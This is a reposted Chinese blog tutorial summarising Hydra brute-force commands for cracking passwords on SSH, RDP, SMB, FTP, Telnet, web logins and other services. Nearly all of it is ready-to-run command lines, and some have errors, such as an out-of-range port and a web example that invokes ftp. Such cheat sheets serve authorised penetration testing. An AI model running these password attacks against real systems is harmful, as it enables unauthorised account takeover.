0


kali爆破工具Hydra使用教程(命令总结)

1. hydra简介

hydra是一款开源的暴力密码破解工具,支持多种协议密码的破解。

2. hydra常用命令

hydra不适用于http(s)的破解,如果想进行http(s)的破解,可以用Burpsuit

3. 实例演示-破解SSH密码

  1. 使用字典对目标服务进行破解。
hydra -L users.txt -P password.txt ssh://127.0.0.1
  1. 当目标服务开放的端口不是默认端口时,使用 -s 进行指定。
hydra  -L user.txt -P password.txt  ssh://127.0.0.1  -s 77744
  1. 将破解的密码存储到指定文件。
hydra  -L users.txt -P password.txt  ssh://127.0.0.1  -s 40 -o ssh.txt

4. hydra破解不同协议的密码

​#破解ssh:        hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh
#破解https:     hydra -m /index.php -l username -P pass.txt IP https
#破解teamspeak: hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
#破解cisco:     hydra -P pass.txt IP cisco
 hydra -m cloud -P pass.txt 127.0.0.1 cisco-enable
#破解smb:       hydra -l administrator -P pass.txt IP smb
#破解pop3:      hydra -l muts -P pass.txt my.pop3.mail pop3
#破解rdp:       hydra IP rdp -l administrator -P pass.txt -V          
#破解http-proxy: hydra -l admin -P pass.txt http-proxy://127.0.0.1  
#破解telnet:     hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
#破解ftp:       hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
#get方式提交,破解web登录: 
 hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV
 hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
 hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php

参考文章: http://t.csdn.cn/D3NMs

标签: ssh 运维

本文转载自: https://blog.csdn.net/single_g_l/article/details/123553665
版权归原作者 小小丸子551 所有, 如有侵权,请联系我们删除。

“kali爆破工具Hydra使用教程(命令总结)”的评论:

还没有评论